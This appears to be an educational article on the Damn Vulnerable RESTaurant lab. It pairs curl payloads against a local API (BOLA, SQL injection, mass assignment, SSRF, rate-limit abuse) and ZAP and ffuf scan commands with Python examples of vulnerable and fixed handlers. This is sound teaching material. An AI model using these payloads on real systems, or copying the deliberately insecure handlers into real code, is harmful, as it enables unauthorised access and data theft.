The Damn Vulnerable RESTaurant is an intentionally insecure API service designed for developers, ethical hackers, and security engineers to practice identifying and exploiting common API vulnerabilities, including those listed in the OWASP Top 10 API Security Risks 2023.
🔗 GitHub Repository: https://github.com/KrzysztofPranczk/Damn-Vulnerable-RESTaurant
🔗 Blog : https://medium.com/@krzysztofpranczk/introducing-damn-vulnerable-restaurant
You Should Know: Essential Commands & Techniques for Testing API Security
1. Setting Up the Lab
Clone the repository and run the vulnerable API locally with Docker Compose (the API then listens on localhost:8000, which every command below assumes):
git clone https://github.com/KrzysztofPranczk/Damn-Vulnerable-RESTaurant.git
cd Damn-Vulnerable-RESTaurant
docker-compose up --build
2. Common API Attacks & Mitigations
Broken Object Level Authorization (BOLA)
Exploit: authenticate as a low-privilege user, then change the object identifier in the path to one that belongs to someone else. The token must be valid: BOLA is an authorization failure, not an authentication failure, so sending an invalid token only tests whether the login check works.
curl -s http://localhost:8000/api/users/1 -H "Authorization: Bearer <token of a low-privilege user who does not own id 1>"
Mitigation: On every request that names an object, check that the authenticated principal is allowed to access that specific object (ownership or an explicit permission), and return the same error for "not found" and "not yours" so identifiers cannot be enumerated.
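The check described above, as an added example in plain Python (no web framework). This is not code from Damn Vulnerable RESTaurant: the order store, the usernames and the bearer tokens are constructed for the demo, and both tokens are deliberately valid so that the only thing separating the two handlers is the object-level check.

```python
# Added example, not code from Damn Vulnerable RESTaurant: an authenticated
# "get object by id" handler with and without an object-level authorization check.
# The store, users and tokens below are constructed sample data.
from dataclasses import dataclass


@dataclass(frozen=True)
class Order:
    order_id: int
    owner: str
    items: tuple


# Constructed data: two users, each owning one order.
ORDERS = {
    1: Order(1, "alice", ("pizza",)),
    2: Order(2, "bob", ("pasta", "wine")),
}
# Constructed bearer tokens. Both are VALID: BOLA is a valid low-privilege
# identity reaching another user's object, not an invalid token.
TOKENS = {"tok-alice": "alice", "tok-bob": "bob"}


class Unauthorized(Exception):
    pass


class Forbidden(Exception):
    pass


def authenticate(authorization_header: str) -> str:
    """Map a 'Bearer <token>' header to a username, or raise Unauthorized."""
    scheme, _, token = authorization_header.partition(" ")
    if scheme != "Bearer" or token not in TOKENS:
        raise Unauthorized("invalid token")
    return TOKENS[token]


def get_order_vulnerable(authorization_header: str, order_id: int) -> Order:
    """Checks WHO the caller is, then returns ANY order by id: the BOLA bug."""
    authenticate(authorization_header)
    return ORDERS[order_id]          # ownership is never checked


def get_order_fixed(authorization_header: str, order_id: int) -> Order:
    """Checks who the caller is AND whether that caller may see this object."""
    user = authenticate(authorization_header)
    order = ORDERS.get(order_id)
    # Same error for "missing" and "belongs to someone else", so the endpoint
    # cannot be used to enumerate which ids exist.
    if order is None or order.owner != user:
        raise Forbidden(f"order {order_id} is not accessible")
    return order


if __name__ == "__main__":
    # Alice tampers with the id to read Bob's order.
    print("vulnerable:", get_order_vulnerable("Bearer tok-alice", 2))
    try:
        get_order_fixed("Bearer tok-alice", 2)
    except Forbidden as exc:
        print("fixed:", exc)
```

The fixed handler does the authorization lookup inside the handler for every object-level request; a framework-level "is logged in" dependency on its own is exactly the state the vulnerable handler is in.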
Injection Attacks (SQLi, Command Injection)
Exploit (SQLi): the classic comment-out payload in the username field. Mind the shell quoting: the single quote inside the JSON would otherwise end the shell string early and the request body would be mangled.
curl -s -X POST http://localhost:8000/api/login -H "Content-Type: application/json" --data "{\"username\":\"admin'--\",\"password\":\"anything\"}"
Mitigation: Use parameterized queries (bound parameters, or an ORM that uses them) so input is never concatenated into SQL text. For command injection, invoke programs with an argument list rather than through a shell, and never pass user input to a shell at all.
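The query the payload above targets, as an added example that is not code from Damn Vulnerable RESTaurant: the same login check built by string concatenation and then with bound parameters, run against an in-memory SQLite database seeded with constructed accounts. Plain-text passwords are used only to keep the demo short; a real service stores password hashes.

```python
# Added example, not code from Damn Vulnerable RESTaurant: a login query built
# by concatenation (injectable) and with bound parameters (not injectable),
# run against an in-memory SQLite database with constructed accounts.
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("admin", "s3cret-admin-pw"), ("alice", "alice-pw")],  # constructed
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Concatenates input into the SQL text, so a quote in `username` rewrites the query."""
    query = ("SELECT username FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    # With username = admin'-- the statement becomes
    #   SELECT username FROM users WHERE username = 'admin'--' AND password = 'anything'
    # and everything after -- is a comment: the password check is gone.
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Binds input as values; the SQL text is fixed and admin'-- is just a username."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable   :", login_vulnerable(conn, "admin'--", "anything"))
    print("parameterized:", login_parameterized(conn, "admin'--", "anything"))
```

The parameterized version is not "escaping done right": the driver never splices the value into the statement, so there is no quoting to get wrong.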
Mass Assignment
Exploit: send a field the client is not supposed to control alongside the expected ones. If the handler binds the whole request body to the persistence model, the extra field is written as if it were legitimate.
curl -s -X POST http://localhost:8000/api/users -H "Content-Type: application/json" -d '{"username":"attacker","isAdmin":true}'
Mitigation: Bind request bodies to an explicit allowlist of writable fields (a dedicated input schema), never straight onto the database model, and treat unexpected fields as a signal worth logging.
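How the allowlist changes the outcome of the request above, as an added example that is not code from Damn Vulnerable RESTaurant. The user model, the field names and the payload are constructed to mirror the curl body.

```python
# Added example, not code from Damn Vulnerable RESTaurant: binding a JSON body
# to a user record with and without a field allowlist. Model, field names and
# payload are constructed to mirror the curl request above.
import json
from dataclasses import dataclass


@dataclass
class User:
    username: str
    email: str = ""
    isAdmin: bool = False   # server-controlled; must never be set from client input


# The only fields a self-registration request may set.
REGISTRATION_FIELDS = {"username", "email"}

# Constructed payload with the same shape as the page's curl -d body.
ATTACK_BODY = '{"username":"attacker","isAdmin":true}'


def create_user_vulnerable(body: str) -> User:
    """Splats the whole JSON object into the model: every model field is writable."""
    return User(**json.loads(body))


def create_user_fixed(body: str) -> User:
    """Copies only allowlisted fields; anything else is silently dropped."""
    data = json.loads(body)
    if not isinstance(data, dict):
        raise ValueError("body must be a JSON object")
    if "username" not in data:
        raise ValueError("username is required")
    safe = {k: v for k, v in data.items() if k in REGISTRATION_FIELDS}
    return User(**safe)


def rejected_fields(body: str) -> set:
    """Fields the client tried to set outside the allowlist: log these, they indicate probing."""
    return set(json.loads(body)) - REGISTRATION_FIELDS


if __name__ == "__main__":
    print("vulnerable:", create_user_vulnerable(ATTACK_BODY))
    print("fixed     :", create_user_fixed(ATTACK_BODY))
    print("rejected  :", rejected_fields(ATTACK_BODY))
```

Privileged fields such as the admin flag get their own endpoint with its own authorization check rather than a spot on the registration schema.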
Server-Side Request Forgery (SSRF)
Exploit: point a URL-fetching endpoint at a host only the server can reach, such as an internal service or a cloud metadata address; the response (or the timing of an error) tells you what the server saw.
curl -s "http://localhost:8000/api/fetch?url=http://internal-server.local"
Mitigation: Validate the URL against an allowlist of schemes and hosts, resolve the host and reject private, loopback and link-local addresses, and do not follow redirects blindly. String sanitization on its own is not enough.
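A validator that applies those rules, as an added example that is not code from Damn Vulnerable RESTaurant. The allowlisted host, the IP addresses and the resolver stub used for testing are constructed; by default the function uses the system resolver.

```python
# Added example, not code from Damn Vulnerable RESTaurant: validating a
# user-supplied URL before a server-side fetch. The allowlisted host and the
# addresses used in the demo are constructed.
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"api.example-partner.com"}   # constructed: the hosts this feature is meant to call


def resolve(host: str) -> list:
    """Resolve a hostname to its IP address strings with the system resolver."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_safe_url(url: str, resolver=resolve) -> bool:
    """Allowlist first, then require every resolved address to be globally routable."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False                                  # file://, gopher://, ...
    if parts.username is not None or parts.password is not None:
        return False                                  # http://allowed-host@evil.example/
    host = parts.hostname
    if host is None or host not in ALLOWED_HOSTS:
        return False                                  # internal names and raw IPs never match
    try:
        addresses = resolver(host)
    except OSError:
        return False
    # An allowlisted name can still be pointed at 10.0.0.0/8 (DNS rebinding, a
    # compromised partner zone), so the resolved addresses are checked too.
    # is_global is False for private, loopback, link-local, reserved and
    # multicast ranges in both IPv4 and IPv6.
    return bool(addresses) and all(ipaddress.ip_address(a).is_global for a in addresses)


if __name__ == "__main__":
    for candidate in ("https://api.example-partner.com/v1/menu",
                      "http://internal-server.local",
                      "http://127.0.0.1:8000/admin",
                      "file:///etc/passwd"):
        print(candidate, "->", "allowed" if is_safe_url(candidate) else "blocked")
```

Two things the validator cannot do on its own: the HTTP client must either refuse redirects or re-validate every hop, and it should connect to the address that was just checked rather than resolving the name a second time, otherwise a rebinding resolver wins the race.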
3. Automated API Scanning with OWASP ZAP
The API scan imports the OpenAPI definition and actively tests every documented operation. The owasp/zap2docker-stable image is deprecated; the maintained image is on GitHub Container Registry. Because the scan runs inside a container, localhost there is the container itself: on Linux use --network host as below, on Docker Desktop replace localhost with host.docker.internal.
docker run --rm --network host -v "$(pwd)":/zap/wrk:rw -t ghcr.io/zaproxy/zaproxy:stable zap-api-scan.py -t http://localhost:8000/openapi.json -f openapi -r report.html
The HTML report lands in the current directory. Operations behind authentication will mostly show as 401/403 unless the scan is configured with a valid token, so an unauthenticated run understates the attack surface.
4. Fuzzing with FFUF
Discover routes the OpenAPI definition does not list by substituting a wordlist for the FUZZ keyword. Keep 401 and 403 responses in the results: they prove a route exists even though it is protected. Add an Authorization header if the API rejects anonymous requests outright.
ffuf -u http://localhost:8000/api/FUZZ -w /usr/share/wordlists/dirb/common.txt -mc all -fc 404
5. Missing Rate Limiting (Unrestricted Resource Consumption)
Exploit: replay a sensitive request in a loop and tally the status codes. If all 100 attempts come back with the same success code, nothing is throttling the endpoint. The e-mail address is a placeholder.
for i in $(seq 1 100); do curl -s -o /dev/null -w '%{http_code}\n' -X POST http://localhost:8000/api/reset_password -H "Content-Type: application/json" --data '{"email":"victim@example.com"}'; done | sort | uniq -c
Mitigation: Rate-limit per source IP and per target account, add CAPTCHA or step-up verification after a small number of attempts, and return the same response whether or not the account exists.
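What that mitigation does to the loop above, as an added example that is not code from Damn Vulnerable RESTaurant: a sliding-window limiter applied per source IP and per target account in front of a password-reset handler, replayed against three constructed traffic patterns. Limits, addresses and timings are constructed; a production service keeps the counters in shared storage such as Redis rather than in process memory.

```python
# Added example, not code from Damn Vulnerable RESTaurant: sliding-window rate
# limiting per client IP and per target account for a password-reset endpoint.
# Limits, addresses and request timing are constructed for the demo.
from collections import Counter, defaultdict


class RateLimiter:
    def __init__(self, limit: int, window_seconds: float):
        self.limit = limit
        self.window = window_seconds
        self._hits = defaultdict(list)      # key -> timestamps of recent requests

    def allow(self, key: str, now: float) -> bool:
        """Allow if fewer than `limit` hits fall inside the trailing window."""
        cutoff = now - self.window
        hits = [t for t in self._hits[key] if t > cutoff]
        self._hits[key] = hits
        if len(hits) >= self.limit:
            return False
        hits.append(now)
        return True


def reset_password(client_ip: str, email: str, now: float,
                   per_ip: RateLimiter, per_account: RateLimiter) -> str:
    """Return the status line the endpoint would answer with."""
    # Two independent buckets: per-IP stops one host spraying many accounts,
    # per-account stops a distributed attacker hammering one victim.
    if not per_ip.allow(client_ip, now) or not per_account.allow(email.lower(), now):
        return "429 Too Many Requests"
    # Identical response whether or not the account exists, so the endpoint
    # cannot be used to confirm valid e-mail addresses.
    return "202 Accepted"


def simulate(ips, emails, step: float = 0.1) -> Counter:
    """Replay (ip, email) pairs `step` seconds apart with fresh limiters; count responses."""
    per_ip = RateLimiter(limit=10, window_seconds=60)
    per_account = RateLimiter(limit=3, window_seconds=3600)
    results = Counter()
    for i, (ip, email) in enumerate(zip(ips, emails)):
        results[reset_password(ip, email, i * step, per_ip, per_account)] += 1
    return results


if __name__ == "__main__":
    # The page's loop: 100 requests from one client against one address.
    print(simulate(["203.0.113.7"] * 100, ["victim@example.com"] * 100))
```

Per-IP limiting alone is defeated by a botnet, and per-account limiting alone lets one host spray reset requests across the whole user base; the simulation shows the two buckets catching each case.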
What Undercode Say
API security is critical in modern applications, and hands-on practice is essential. The Damn Vulnerable RESTaurant provides a safe environment to test exploits like BOLA, Injection, SSRF, and Mass Assignment. Always:
– Validate inputs
– Enforce strict authentication
– Monitor API traffic
– Use automated scanners like OWASP ZAP
References:
Reported By: Krzysztof Pranczk – Hackers Feeds